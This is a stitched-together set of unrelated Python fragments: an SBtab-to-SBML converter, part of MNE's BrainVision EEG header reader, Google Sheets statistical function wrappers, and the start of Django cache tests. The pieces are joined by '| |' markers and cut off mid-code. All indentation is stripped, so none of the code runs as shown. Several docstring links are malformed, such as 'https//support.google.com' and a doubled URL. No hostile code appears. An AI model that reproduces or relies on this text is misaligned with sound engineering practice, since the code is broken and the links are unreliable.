#if '!Name' in sbtab.columns and not row[sbtab.columns_dict['!Name']] == '' and not str(row[sbtab.columns_dict['!Name']]).startswith('No Name'):
# #if '|' in row[sbtab.columns_dict['!Name']]: compartment.setName(str(row[sbtab.columns_dict['!Name']].split('|')[0]))
# compartment.setName(str(row[sbtab.columns_dict['!Name']]))
#else:
self.compartment_list.append(row[sbtab.columns_dict['!ID']])
#set the compartment sizes if given
if '!Size' in sbtab.columns:
for comp in self.new_model.getListOfCompartments():
for compsbtab in sbtab.value_rows:
if comp.getId() == compsbtab[sbtab.columns_dict['!ID']] and compsbtab[sbtab.columns_dict['!Size']] != '':
comp.setSize(float(compsbtab[sbtab.columns_dict['!Size']]))
if '!SBOTerm' in sbtab.columns and row[sbtab.columns_dict['!SBOTerm']] != '':
try: compartment.setSBOTerm(int(row[sbtab.columns_dict['!SBOTerm']][4:]))
except: pass
for column in sbtab.columns_dict.keys():
if "Identifiers" in column:
annot = row[sbtab.columns_dict[column]]
if annot == '':
continue
for pattern in urns:
if pattern in column:
urn = pattern
try:
cv_term = self.setAnnotation(compartment,annot,urn,'Model')
compartment.addCVTerm(cv_term)
except:
print('There was an annotation that I could not assign properly: ',compartment.getId(),annot)
def compoundSBtab(self):
'''
Extracts the information from the Compound SBtab and writes it to the model.
'''
sbtab = self.type2sbtab['Compound']
for row in sbtab.value_rows:
if not row[sbtab.columns_dict['!ID']] in self.species_list:
species = self.new_model.createSpecies()
if '!Compound:SBML:species:id' in sbtab.columns and row[sbtab.columns_dict['!Compound:SBML:species:id']] != '':
species.setId(str(row[sbtab.columns_dict['!Compound:SBML:species:id']]))
self.id2sbmlid[row[sbtab.columns_dict['!ID']]] = row[sbtab.columns_dict['!Compound:SBML:species:id']]
else:
species.setId(str(row[sbtab.columns_dict['!ID']]))
self.id2sbmlid[row[sbtab.columns_dict['!ID']]] = None
if '!Name' in sbtab.columns and not row[sbtab.columns_dict['!Name']] == '':
if '|' in row[sbtab.columns_dict['!Name']]: species.setName(str(row[sbtab.columns_dict['!Name']].split('|')[0]))
else: species.setName(str(row[sbtab.columns_dict['!Name']]))
self.species_list.append(species.getId())
#check out the speciestype if possible
if '!SBML:speciestype:id' in sbtab.columns and row[sbtab.columns_dict['!SBML:speciestype:id']] != '':
species_type = self.new_model.createSpeciesType()
species_type.setId(str(row[sbtab.columns_dict['!SBML:speciestype:id']]))
species.setSpeciesType(row[sbtab.columns_dict['!SBML:speciestype:id']])
#if compartments are given, add them
if '!Location' in sbtab.columns and row[sbtab.columns_dict['!Location']] != '':
if not row[sbtab.columns_dict['!Location']] in self.compartment_list:
new_comp = self.new_model.createCompartment()
new_comp.setId(str(row[sbtab.columns_dict['!Location']]))
self.compartment_list.append(row[sbtab.columns_dict['!Location']])
species.setCompartment(row[sbtab.columns_dict['!Location']])
elif self.def_comp_set:
species.setCompartment('Default_Compartment')
if '!InitialConcentration' in sbtab.columns and row[sbtab.columns_dict['!InitialConcentration']] != '':
species.setInitialConcentration(float(row[sbtab.columns_dict['!InitialConcentration']]))
elif '!InitialValue' in sbtab.columns and row[sbtab.columns_dict['!InitialValue']] != '':
| |
| 'auto'
Names of channels or list of indices that should be designated
MISC channels. Values should correspond to the electrodes
in the vhdr file. If 'auto', units in vhdr file are used for inferring
misc channels. Default is ``'auto'``.
scale : float
The scaling factor for EEG data. Unless specified otherwise by
header file, units are in microvolts. Default scale factor is 1.
montage : str | True | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
Returns
-------
info : Info
The measurement info.
fmt : str
The data format in the file.
edf_info : dict
A dict containing Brain Vision specific parameters.
events : array, shape (n_events, 3)
Events from the corresponding vmrk file.
"""
scale = float(scale)
ext = os.path.splitext(vhdr_fname)[-1]
if ext != '.vhdr':
raise IOError("The header file must be given to read the data, "
"not the '%s' file." % ext)
with open(vhdr_fname, 'rb') as f:
# extract the first section to resemble a cfg
header = f.readline()
codepage = 'utf-8'
# we don't actually need to know the coding for the header line.
# the characters in it all belong to ASCII and are thus the
# same in Latin-1 and UTF-8
header = header.decode('ascii', 'ignore').strip()
_check_hdr_version(header)
settings = f.read()
try:
# if there is an explicit codepage set, use it
# we pretend like it's ascii when searching for the codepage
cp_setting = re.search('Codepage=(.+)',
settings.decode('ascii', 'ignore'),
re.IGNORECASE & re.MULTILINE)
if cp_setting:
codepage = cp_setting.group(1).strip()
settings = settings.decode(codepage)
except UnicodeDecodeError:
# if UTF-8 (new standard) or explicit codepage setting fails,
# fallback to Latin-1, which is Windows default and implicit
# standard in older recordings
settings = settings.decode('latin-1')
if settings.find('[Comment]') != -1:
params, settings = settings.split('[Comment]')
else:
params, settings = settings, ''
cfg = configparser.ConfigParser()
if hasattr(cfg, 'read_file'): # newer API
cfg.read_file(StringIO(params))
else:
cfg.readfp(StringIO(params))
# get sampling info
# Sampling interval is given in microsec
sfreq = 1e6 / cfg.getfloat('Common Infos', 'SamplingInterval')
info = _empty_info(sfreq)
# check binary format
assert cfg.get('Common Infos', 'DataFormat') == 'BINARY'
order = cfg.get('Common Infos', 'DataOrientation')
if order not in _orientation_dict:
raise NotImplementedError('Data Orientation %s is not supported'
% order)
order = _orientation_dict[order]
fmt = cfg.get('Binary Infos', 'BinaryFormat')
if fmt not in _fmt_dict:
raise NotImplementedError('Datatype %s is not supported' % fmt)
fmt = _fmt_dict[fmt]
# load channel labels
nchan = cfg.getint('Common Infos', 'NumberOfChannels') + 1
ch_names = [''] * nchan
cals = np.empty(nchan)
ranges = np.empty(nchan)
cals.fill(np.nan)
ch_dict = dict()
misc_chs = dict()
for chan, props in cfg.items('Channel Infos'):
n = int(re.findall(r'ch(\d+)', chan)[0]) - 1
props = props.split(',')
# default to microvolts because that's what the older brainvision
# standard explicitly assumed; the unit is only allowed to be
# something else if explicitly stated (cf. EEGLAB export below)
if len(props) < 4:
props += (u'µV',)
name, _, resolution, unit = props[:4]
ch_dict[chan] = name
ch_names[n] = name
if resolution == "":
if not(unit): # For truncated vhdrs (e.g. EEGLAB export)
resolution = 0.000001
else:
resolution = 1. # for files with units specified, but not res
unit = unit.replace(u'\xc2', u'') # Remove unwanted control characters
cals[n] = float(resolution)
ranges[n] = _unit_dict.get(unit, 1) * scale
if unit not in ('V', u'µV', 'uV'):
misc_chs[name] = (FIFF.FIFF_UNIT_CEL if unit == 'C'
else FIFF.FIFF_UNIT_NONE)
misc = list(misc_chs.keys()) if misc == 'auto' else misc
# create montage
if montage is True:
from ...transforms import _sphere_to_cartesian
from ...channels.montage import Montage
montage_pos = list()
montage_names = list()
for ch in cfg.items('Coordinates'):
montage_names.append(ch_dict[ch[0]])
radius, theta, phi = map(float, ch[1].split(','))
# 1: radius, 2: theta, 3: phi
pos = _sphere_to_cartesian(r=radius, theta=theta, phi=phi)
montage_pos.append(pos)
montage_sel = np.arange(len(montage_pos))
montage = Montage(montage_pos, montage_names, 'Brainvision',
montage_sel)
ch_names[-1] = 'STI 014'
cals[-1] = 1.
ranges[-1] = 1.
if np.isnan(cals).any():
raise RuntimeError('Missing channel units')
# Attempts to extract filtering info from header. If not found, both are
# set to zero.
settings = settings.splitlines()
idx = None
if 'Channels' in settings:
idx = settings.index('Channels')
settings = settings[idx + 1:]
hp_col, lp_col = 4, 5
for idx, setting in enumerate(settings):
if re.match('#\s+Name', setting):
break
else:
idx = None
# If software filters are active, then they override the hardware setup
# But we still want to be able to double check the channel names
# for alignment purposes, we keep track of the hardware setting idx
idx_amp = idx
if 'S o f t w a r e F i l t e r s' in settings:
idx = settings.index('S o f t w a r e F i l t e r s')
for idx, setting in enumerate(settings[idx + 1:], idx + 1):
if re.match('#\s+Low Cutoff', setting):
hp_col, lp_col = 1, 2
warn('Online software filter detected. Using software '
'filter settings and ignoring hardware values')
break
else:
idx = idx_amp
if idx:
lowpass = []
highpass = []
# extract filter units and convert s to Hz if necessary
# this cannot be done as post-processing as the inverse t-f
# relationship means that the min/max comparisons don't make sense
# unless we know the units
header = re.split('\s\s+', settings[idx])
hp_s = '[s]' in header[hp_col]
lp_s = '[s]' in header[lp_col]
for i, ch in enumerate(ch_names[:-1], 1):
line = re.split('\s\s+', settings[idx + i])
# double check alignment with channel by using the hw settings
# the actual divider is multiple spaces -- for newer BV
# files, the unit is specified for every channel separated
# by a single space, while for older files, the unit is
# specified in the column headers
if idx == idx_amp:
line_amp = line
else:
line_amp = re.split('\s\s+', settings[idx_amp + i])
assert ch in line_amp
highpass.append(line[hp_col])
lowpass.append(line[lp_col])
if len(highpass) == 0:
pass
elif len(set(highpass)) == 1:
if highpass[0] in ('NaN', 'Off'):
pass # Placeholder for future use. Highpass set in _empty_info
elif highpass[0] == 'DC':
info['highpass'] = 0.
else:
info['highpass'] = float(highpass[0])
if hp_s:
info['highpass'] = 1. / info['highpass']
else:
heterogeneous_hp_filter = True
if hp_s:
# We convert channels with disabled filters to having
# highpass relaxed / no filters
highpass = [float(filt) if filt not in ('NaN', 'Off', 'DC')
else np.Inf for filt in highpass]
info['highpass'] = np.max(np.array(highpass, dtype=np.float))
# Coveniently enough 1 / np.Inf = 0.0, so this works for
# DC / no highpass filter
info['highpass'] = 1. / info['highpass']
# not exactly the cleanest use of FP, but this makes us
# more conservative in *not* warning.
if info['highpass'] == 0.0 and len(set(highpass)) == 1:
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_hp_filter = False
else:
highpass = [float(filt) if filt not in ('NaN', 'Off', 'DC')
else 0.0 for filt in highpass]
info['highpass'] = np.min(np.array(highpass, dtype=np.float))
if info['highpass'] == 0.0 and len(set(highpass)) == 1:
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_hp_filter = False
if heterogeneous_hp_filter:
warn('Channels contain different highpass filters. '
'Lowest (weakest) filter setting (%0.2f Hz) '
'will be stored.' % info['highpass'])
if len(lowpass) == 0:
pass
elif len(set(lowpass)) == 1:
if lowpass[0] in ('NaN', 'Off'):
pass # Placeholder for future use. Lowpass set in _empty_info
else:
info['lowpass'] = float(lowpass[0])
if lp_s:
info['lowpass'] = 1. / info['lowpass']
else:
heterogeneous_lp_filter = True
if lp_s:
# We convert channels with disabled filters to having
# infinitely relaxed / no filters
lowpass = [float(filt) if filt not in ('NaN', 'Off')
else 0.0 for filt in lowpass]
info['lowpass'] = np.min(np.array(lowpass, dtype=np.float))
try:
info['lowpass'] = 1. / info['lowpass']
except ZeroDivisionError:
if len(set(lowpass)) == 1:
# No lowpass actually set for the weakest setting
# so we set lowpass to the Nyquist frequency
info['lowpass'] = info['sfreq'] / 2.
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_lp_filter = False
else:
# no lowpass filter is the weakest filter,
# | |
HYPGEOMDIST"
return Function("HYPGEOM_DIST", args)
def HYPGEOMDIST(*args) -> Function:
"""
Calculates the probability of drawing a certain number of successes in a certain
number of tries given a population of a certain size containing a certain number
of successes, without replacement of draws.
Learn more: https//support.google.com/docs/answer/3094004
"""
return Function("HYPGEOMDIST", args)
def INTERCEPT(*args) -> Function:
"""
Calculates the y-value at which the line resulting from linear regression of a
dataset will intersect the y-axis (x=0).
Learn more: https//support.google.com/docs/answer/3093632
"""
return Function("INTERCEPT", args)
def KURT(*args) -> Function:
"""
Calculates the kurtosis of a dataset, which describes the shape, and in
particular the "peakedness" of that dataset.
Learn more: https//support.google.com/docs/answer/3093634
"""
return Function("KURT", args)
def LARGE(*args) -> Function:
"""
Returns the nth largest element from a data set, where n is user-defined.
Learn more: https//support.google.com/docs/answer/3094008
"""
return Function("LARGE", args)
def LOGINV(*args) -> Function:
"""
Returns the value of the inverse log-normal cumulative distribution with given
mean and standard deviation at a specified value.
Learn more: https//support.google.com/docs/answer/3094010
"""
return Function("LOGINV", args)
def LOGNORM_DIST(*args) -> Function:
"See LOGNORMDIST"
return Function("LOGNORM_DIST", args)
def LOGNORM_INV(*args) -> Function:
"See LOGINV"
return Function("LOGNORM_INV", args)
def LOGNORMDIST(*args) -> Function:
"""
Returns the value of the log-normal cumulative distribution with given mean and
standard deviation at a specified value.
Learn more: https//support.google.com/docs/answer/3094011
"""
return Function("LOGNORMDIST", args)
def MAX(*args) -> Function:
"""
Returns the maximum value in a numeric dataset.
Learn more: https//support.google.com/docs/answer/3094013
"""
return Function("MAX", args)
def MAXA(*args) -> Function:
"""
Returns the maximum numeric value in a dataset.
Learn more: https//support.google.com/docs/answer/3094016
"""
return Function("MAXA", args)
def MAXIFS(*args) -> Function:
"""
Returns the maximum value in a range of cells, filtered by a set of criteria.
Learn more: https//support.google.com/docs/answer/7013817
"""
return Function("MAXIFS", args)
def MEDIAN(*args) -> Function:
"""
Returns the median value in a numeric dataset.
Learn more: https//support.google.com/docs/answer/3094025
"""
return Function("MEDIAN", args)
def MIN(*args) -> Function:
"""
Returns the minimum value in a numeric dataset.
Learn more: https//support.google.com/docs/answer/3094017
"""
return Function("MIN", args)
def MINA(*args) -> Function:
"""
Returns the minimum numeric value in a dataset.
Learn more: https//support.google.com/docs/answer/3094018
"""
return Function("MINA", args)
def MINIFS(*args) -> Function:
"""
Returns the minimum value in a range of cells, filtered by a set of criteria.
Learn more: https//support.google.com/docs/answer/7014063
"""
return Function("MINIFS", args)
def MODE(*args) -> Function:
"""
Returns the most commonly occurring value in a dataset.
Learn more: https//support.google.com/docs/answer/3094029
"""
return Function("MODE", args)
def MODE_MULT(*args) -> Function:
"""
Returns the most commonly occurring values in a dataset.
Learn more: https//support.google.com/docs/answer/9368267.
"""
return Function("MODE_MULT", args)
def MODE_SNGL(*args) -> Function:
"See MODE"
return Function("MODE_SNGL", args)
def NEGBINOM_DIST(*args) -> Function:
"See NEGBINOMDIST"
return Function("NEGBINOM_DIST", args)
def NEGBINOMDIST(*args) -> Function:
"""
Calculates the probability of drawing a certain number of failures before a
certain number of successes given a probability of success in independent
trials.
Learn more: https//support.google.com/docs/answer/3094031
"""
return Function("NEGBINOMDIST", args)
def NORM_DIST(*args) -> Function:
"See NORMDIST"
return Function("NORM_DIST", args)
def NORM_INV(*args) -> Function:
"See NORMINV"
return Function("NORM_INV", args)
def NORM_S_DIST(*args) -> Function:
"See NORMSDIST"
return Function("NORM_S_DIST", args)
def NORM_S_INV(*args) -> Function:
"See NORMSINV"
return Function("NORM_S_INV", args)
def NORMDIST(*args) -> Function:
"""
Returns the value of the normal distribution function (or normal cumulative
distribution function) for a specified value, mean, and standard deviation.
Learn more: https//support.google.com/docs/answer/3094021
"""
return Function("NORMDIST", args)
def NORMINV(*args) -> Function:
"""
Returns the value of the inverse normal distribution function for a specified
value, mean, and standard deviation.
Learn more: https//support.google.com/docs/answer/3094022
"""
return Function("NORMINV", args)
def NORMSDIST(*args) -> Function:
"""
Returns the value of the standard normal cumulative distribution function for a
specified value.
Learn more: https//support.google.com/docs/answer/3094089
"""
return Function("NORMSDIST", args)
def NORMSINV(*args) -> Function:
"""
Returns the value of the inverse standard normal distribution function for a
specified value.
Learn more: https//support.google.com/docs/answer/3094091
"""
return Function("NORMSINV", args)
def PEARSON(*args) -> Function:
"""
Calculates r, the Pearson product-moment correlation coefficient of a dataset.
Learn more: https//support.google.com/docs/answer/3094092
"""
return Function("PEARSON", args)
def PERCENTILE(*args) -> Function:
"""
Returns the value at a given percentile of a dataset.
Learn more: https//support.google.com/docs/answer/3094093
"""
return Function("PERCENTILE", args)
def PERCENTILE_EXC(*args) -> Function:
"""
Returns the value at a given percentile of a dataset, exclusive of 0 and 1.
Learn more: https//support.google.com/docs/answer/9368167.
"""
return Function("PERCENTILE_EXC", args)
def PERCENTILE_INC(*args) -> Function:
"See PERCENTILE"
return Function("PERCENTILE_INC", args)
def PERCENTRANK(*args) -> Function:
"""
Returns the percentage rank (percentile) of a specified value in a dataset.
Learn more: https//support.google.com/docs/answer/3094095
"""
return Function("PERCENTRANK", args)
def PERCENTRANK_EXC(*args) -> Function:
"""
Returns the percentage rank (percentile) from 0 to 1 exclusive of a specified
value in a dataset.
Learn more: https//support.google.com/docs/answer/3267357
"""
return Function("PERCENTRANK_EXC", args)
def PERCENTRANK_INC(*args) -> Function:
"""
Returns the percentage rank (percentile) from 0 to 1 inclusive of a specified
value in a dataset.
Learn more: https//support.google.com/docs/answer/3267360
"""
return Function("PERCENTRANK_INC", args)
def PERMUTATIONA(*args) -> Function:
"""
Returns the number of permutations for selecting a group of objects (with
replacement) from a total number of objects.
Learn more: https//support.google.com/docs/answer/9368324.
"""
return Function("PERMUTATIONA", args)
def PERMUT(*args) -> Function:
"""
Returns the number of ways to choose some number of objects from a pool of a
given size of objects, considering order.
Learn more: https//support.google.com/docs/answer/3094036
"""
return Function("PERMUT", args)
def PHI(*args) -> Function:
"""
The PHI function returns the value of the normal distribution with mean 0 and
standard deviation 1.
Learn more: https//support.google.com/docs/answer/9116365.
"""
return Function("PHI", args)
def POISSON(*args) -> Function:
"See POISSON.DIST"
return Function("POISSON", args)
def POISSON_DIST(*args) -> Function:
"""
Returns the value of the Poisson distribution function (or Poisson cumulative
distribution function) for a specified value and mean.
Learn more:
https//support.google.comhttps://support.google.com/docs/answer/3094097.
"""
return Function("POISSON_DIST", args)
def PROB(*args) -> Function:
"""
Given a set of values and corresponding probabilities, calculates the
probability that a value chosen at random falls between two limits.
Learn more: https//support.google.com/docs/answer/3094039
"""
return Function("PROB", args)
def QUARTILE(*args) -> Function:
"""
Returns a value nearest to a specified quartile of a dataset.
Learn more: https//support.google.com/docs/answer/3094041
"""
return Function("QUARTILE", args)
def QUARTILE_EXC(*args) -> Function:
"""
Returns value nearest to a given quartile of a dataset, exclusive of 0 and 4.
Learn more: https//support.google.com/docs/answer/9368240.
"""
return Function("QUARTILE_EXC", args)
def QUARTILE_INC(*args) -> Function:
"See QUARTILE"
return Function("QUARTILE_INC", args)
def RANK(*args) -> Function:
"""
Returns the rank of a specified value in a dataset.
Learn more: https//support.google.com/docs/answer/3094098
"""
return Function("RANK", args)
def RANK_AVG(*args) -> Function:
"""
Returns the rank of a specified value in a dataset. If there is more than one
entry of the same value in the dataset, the average rank of the entries will be
returned.
Learn more: https//support.google.com/docs/answer/3267309
"""
return Function("RANK_AVG", args)
def RANK_EQ(*args) -> Function:
"""
Returns the rank of a specified value in a dataset. If there is more than one
entry of the same value in the dataset, the top rank of the entries will be
returned.
Learn more: https//support.google.com/docs/answer/3267310
"""
return Function("RANK_EQ", args)
def RSQ(*args) -> Function:
"""
Calculates the square of r, the Pearson product-moment correlation coefficient
of a dataset.
Learn more: https//support.google.com/docs/answer/3094099
"""
return Function("RSQ", args)
def SKEW(*args) -> Function:
"""
Calculates the skewness of a dataset, which describes the symmetry of that
dataset about the mean.
Learn more: https//support.google.com/docs/answer/3094101
"""
return Function("SKEW", args)
def SKEW_P(*args) -> Function:
"""
Calculates the skewness of a dataset that represents the entire population.
Learn more: https//support.google.com/docs/answer/9368569.
"""
return Function("SKEW_P", args)
def SLOPE(*args) -> Function:
"""
Calculates the slope of the line resulting from linear regression of a dataset.
Learn more: https//support.google.com/docs/answer/3094048
"""
return Function("SLOPE", args)
def SMALL(*args) -> Function:
"""
Returns the nth smallest element from a data set, where n is user-defined.
Learn more: https//support.google.com/docs/answer/3094050
"""
return Function("SMALL", args)
def STANDARDIZE(*args) -> Function:
"""
Calculates the normalized equivalent of a random variable given mean and
standard deviation of the distribution.
Learn more: https//support.google.com/docs/answer/3094102
"""
return Function("STANDARDIZE", args)
def STDEV(*args) -> Function:
"""
Calculates the standard deviation based on a sample.
Learn more: https//support.google.com/docs/answer/3094054
"""
return Function("STDEV", args)
def STDEV_P(*args) -> Function:
"See STDEVP"
return Function("STDEV_P", args)
def STDEV_S(*args) -> Function:
"See STDEV"
return Function("STDEV_S", args)
def STDEVA(*args) -> Function:
"""
Calculates the standard deviation based on a sample, setting text to the value
`0`.
Learn more: https//support.google.com/docs/answer/3094055
"""
return Function("STDEVA", args)
def STDEVP(*args) -> Function:
"""
Calculates the | |
<filename>tests/cache/tests.py
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, mock,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
